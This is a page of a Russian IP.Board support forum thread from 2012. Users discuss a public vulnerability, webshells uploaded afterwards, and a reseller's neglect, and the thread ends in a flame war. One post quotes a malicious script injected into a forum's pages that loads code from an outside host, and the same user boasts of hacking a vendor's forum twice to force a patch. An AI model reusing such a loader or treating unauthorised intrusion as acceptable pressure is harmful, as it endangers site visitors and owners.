Security update - Страница 7 - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

СвернутьПрикрепленные теги

вирус ipb обновления безопасности

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

Security update

#91 Пользователь не на сайте   chuma64rus ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 14
  • Регистрация: 25-Апрель 09
  • Репутация: 1
  • IPB version:3.3.x
 

Отправлено 11 Ноябрь 2012 - 18:51

А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча )))
0

#92 Пользователь не на сайте   GluK ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 186
  • Регистрация: 19-Январь 06
  • Репутация: 2
  • IPB version:3.3.x
 

Отправлено 11 Ноябрь 2012 - 19:52

еще в папке uploads находилось три файла: 33e34866fa7dd24bc7d0091daae6031f.php, b65840916dc6f0ccc3b41fc9611e7e02.php и f9a859fa33368da398a7eb96773fb836.php
0

#93 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 11 Ноябрь 2012 - 20:44

Просмотреть сообщениеchuma64rus сказал(а):

А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча )))

За последние 2 года я лично отправлял около 40 репортов об уязвимостях большей или меньшей сложности. Был и код, кладущий сервер "на лопатки", и XSS, и SQL Injection, и много чего еще. Все это молча латалось в очередном обновлении. А в данном случае проблема не в том, какая открылась дыра, и не в том, как отреагировали IPS, а в том, КТО нашел дыру. Этот типичный "фрилансер - специалист по безопасности", которому необходима слава и известность, и потому, только открыв уязвимость, он тут же радостно распихал код своего эксплоита по всем существующим в мире хак-ресурсам, так что ни о каком "тихом" закрытии дыры речь уже не шла.

Цитата

Hi, my name is Egidio Romano (aka EgiX) and I'm a freelance web application security researcher.

Погуглите эту фразу. Этот человек регулярно кидает сразу в паблик найденные дыры во всех подряд продуктах. Посылайте лучики любви ему.
2

#94 Пользователь не на сайте   Семёныч ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 176
  • Регистрация: 21-Июль 10
  • Репутация: 3
  • IPB version:3.3.x
 

Отправлено 11 Ноябрь 2012 - 20:59

Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??
0

#95 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 11 Ноябрь 2012 - 21:09

Цитата

Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??

Потому что им как всегда насрать на своих клиентов, не? :)
2

#96 Пользователь не на сайте   chuma64rus ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 14
  • Регистрация: 25-Апрель 09
  • Репутация: 1
  • IPB version:3.3.x
 

Отправлено 11 Ноябрь 2012 - 22:45

Просмотреть сообщениеRitsuka сказал(а):

Потому что им как всегда насмешить на своих клиентов

Полностью согласен, да они как мне известно и продавать то ее уже не имеют право.
0

#97 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 11 Ноябрь 2012 - 23:32

У них сейчас другая игрушка, а с IP.Board они просто "додаивают" остатки денег. Переводы давно не обновляют - тупо меняют циферки версии и добавляют пару строк. Паджинатор как перевели неправильно полгода назад - так и не исправили. Компоненты все отстали уже на 1-2 версии от IPS-овских, а галерея так и вообще на 5 минорных и одну мажорную. Форум заброшен и часто вообще не работает. "Русификацию" свою нифига не тестируют. За новостями и патчами не следят. Минимум телодвижений. Да и зачем? Другая игрушка есть, а IPB не удаляется по одной причине - пока дураки деньги просто так будут нести - будут брать. Как нести перенстанут - закроют лавочку.
1

#98 Пользователь не на сайте   Семёныч ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 176
  • Регистрация: 21-Июль 10
  • Репутация: 3
  • IPB version:3.3.x
 

Отправлено 12 Ноябрь 2012 - 05:59

Ritsuka, А где ж тогда покупать русскоязычную версию???
0

#99 Пользователь не на сайте   GeoLik ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 785
  • Регистрация: 10-Март 07
  • Репутация: 42
  • IPB version:3.3.x
 

Отправлено 12 Ноябрь 2012 - 09:00

Семёныч, пока не появится в России нормальный реселлер, покупать русскую версию негде. Увы.
Видимо свои форумы буду конвертировать в Битрикс и LogicBoard (один конвертировал, функциональности меньше, но терпимо, работает). Но..
Первый вариант слишком дорог, не всем пойдет, а также жрет ну очень много ресурсов, малофункционален, но вроде как надежен - все-таки фреймворк от серьезного разработчика. Второй вариант дешев, тоже малофункционален (но поболее нежели у Битрикс), совсем нет шаблонов дизайна, а самому кастомизировать непросто - сложнее нежели для IPB, разработчик - одиночка, форум поддержки нагло окупировали спамеры и бессовестно предлагают свои услуги - как-то все получается несерьезно.
А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.
0

#100 Пользователь не на сайте   12345123451 ответил: »

 
 
  • Newbie
  • *
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1
  • Регистрация: 22-Ноябрь 11
  • Репутация: 0
  • IPB version:3.2.x
 

Отправлено 12 Ноябрь 2012 - 09:02

Просмотреть сообщениеСемёныч 12 Ноябрь 2012 - 05:59 сказал(а):

Ritsuka, А где ж тогда покупать русскоязычную версию???

Берешь eng. Далее можешь перелопатить ее как угодно.
При наличии времени и опыта - конечно.
0

#101 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 12 Ноябрь 2012 - 11:00

Просмотреть сообщениеСемёныч сказал(а):

Ritsuka, А где ж тогда покупать русскоязычную версию???

Полный бесплатный русский перевод от Yurri:
http://community.inv...board-3rd-apps-

Русский перевод от IBR, бесплатно залитый на IPS и обновляемый "энтузиастом" (содержит забавные косяки):
http://community.inv...er-translation/

А еще на 19% выполнен бесплатный коллективный перевод скрипта на русский язык:
http://community.inv...p?app=languages

Можете просто взять любой готовый, или поучаствовать в коллективной работе по переводу.

Цитата

А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.

Что-то вы все больше становитесь похожим на oilforum. Ну ок, вы разочаровались в этой жизни, в IPB и вообще - ведь как же так, "за целых 4 года вдруг внезапно моментально запатченная дырка нашлась! никакой уверенности в завтрашнем дне!!!111" - но это еще не дает вам оснований во всех подряд темах и разделах, где люди спрашивают, как им решить проблемы с IP.Board, влезать с предложениями о переходе на другой скрипт. Мало того, что это никак не помогает в решении проблемы и вообще является оффтопом, это еще и раздражает. oilforum кончил баном. А вы как планируете?
2

#102 Пользователь не на сайте   GluK ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 186
  • Регистрация: 19-Январь 06
  • Репутация: 2
  • IPB version:3.3.x
 

Отправлено 12 Ноябрь 2012 - 11:44

Тема плавн оперешла в другое направление. Но я все вспрошу Ritsuka - какой по твоему мнению самый достойный перевод? от Yurri?
0

#103 Пользователь не на сайте   GeoLik ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 785
  • Регистрация: 10-Март 07
  • Репутация: 42
  • IPB version:3.3.x
 

Отправлено 12 Ноябрь 2012 - 12:59

Просмотреть сообщениеRitsuka сказал(а):

Что-то вы все больше становитесь похожим на спам

У людей иногда бывает схожесть. Особенно если не вникать в мировоззрение собеседника, и вообще его не слушать (а только себя), но перед этим первым предложить беседовать.

А нудишь как раз сам. Начал нудеть на форуме IBR, продолжил на форуме и блогах IPS - всюду тебя забанили, что "наши", что "не наши".

Когда такие юноши как ты попадали служить в мое подразделение, как раз мне приходилось стоять у изголовья чуть ли не каждую ночь, чтобы не дай Бог кто-нить не обидел.

А теперь можешь и меня забанить.
0

#104 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 12 Ноябрь 2012 - 13:35

Цитата

А теперь можешь и меня забанить.

Зачем? Пусть другие администраторы решают.

На IPS я, кстати, не совсем забанен, а в ридонли, и случилось это по 2 эпизодам:

1. Как-то отрепортив очередной критический баг, я, устав в течении 2 недель ждать очередного пачта или хоть какой-то реакции, дважды взломал через него их официальный форум. После этого уже через 2 дня вышел патч, но на меня обиделись.

2. Когда выходил IP.Nexus я активно сопротивлялся тому, чтобы он был закодирован, аппелируя к асбурдности аргумента "так будет безопаснее". И был прав - все платежные гейтвеи в конечном счете все равно оставили с открытым кодом (и где безопасность?), а закодированный код приложения не позволяет эффективно выявлять и исправлять многочисленные ошибки в скриптах - и в конечном итоге получилось, что, когда мои знакомые, или люди тут на форуме просят помочь с нексусом - ничего не остается, кроме как посылать всех в IPS.

А про IBR тут все и так знают - их было, и сейчас есть за что критиковать. Форум тогда каждый день наполнялся сотней спам-постов, а IBR было начхать. Единственной реакцией на все претензии был бан. Ну, зато хоть теперь спама нет. Правда, это не отменяет факта, что им и сейчас на все начхать, посмотрите хотя бы на первые строки кода страниц на их форуме:
<!--Csoul--><script type="text/javascript"><!--
var url = 'http://dosxfgb.servebbs.net';
document.write('<sc' + 'ript language="JavaScript" ' + 
'src="' + url + '/6201/counter.xhtml"></sc' + 
'ript>')
//--></script><!--/Csoul--><!DOCTYPE html>


Как затроянили им форум - так никто и не потрудился почистить.

Я называю "нудением" случаи, когда люди сгущают краски и рассказывают, как им самим плохо, выставляя их личные трудности как недостатки продукта. Вы выше писали, что у вас проблемы с излишне обостренным патриотизмом и с не знанием языков, и что именно это мешает вам продложать пользоваться IP.Board. Ок, вы имеете право на такую проблему. Но стоит ли теперь ходить и рассказывать всем, что "IP.Board умирает, надо искать альтернативы"? Вы что, считаете, что тем, кто осознанно выбрал IP.Board и имеет опыт общения с иностранными сайтами, ваши стоны кажутся актуальными? Тем более что один раз вы уже высказали свое мнение, и никто вам не мешал. Зачем теперь тиражировать ваше абстрактное субъективное по всем другим конкретным темам форума?
2

#105 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 12 Ноябрь 2012 - 13:54

GeoLik, и остальные желающие "переехать" на другие платформы, создавайте отдельно тему и обсуждайте там свой переезд, да и вообще можете перенести свое общение на ресурсах поддержки этих движков. Здесь форум поддержки ИПБ а не каких-то ЛБ или битриксов. Ваши сообщения порядком уже начали подноедать, ну прямо второй ойлфорум, тот тоже в каждом сообщение ныл о переезде, а до сих пор сидит на ипб. В этом отношении полностью солидарен с Ritsuka. На этом флуд в этой теме закончим.
1

Сообщить об этой теме:


  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна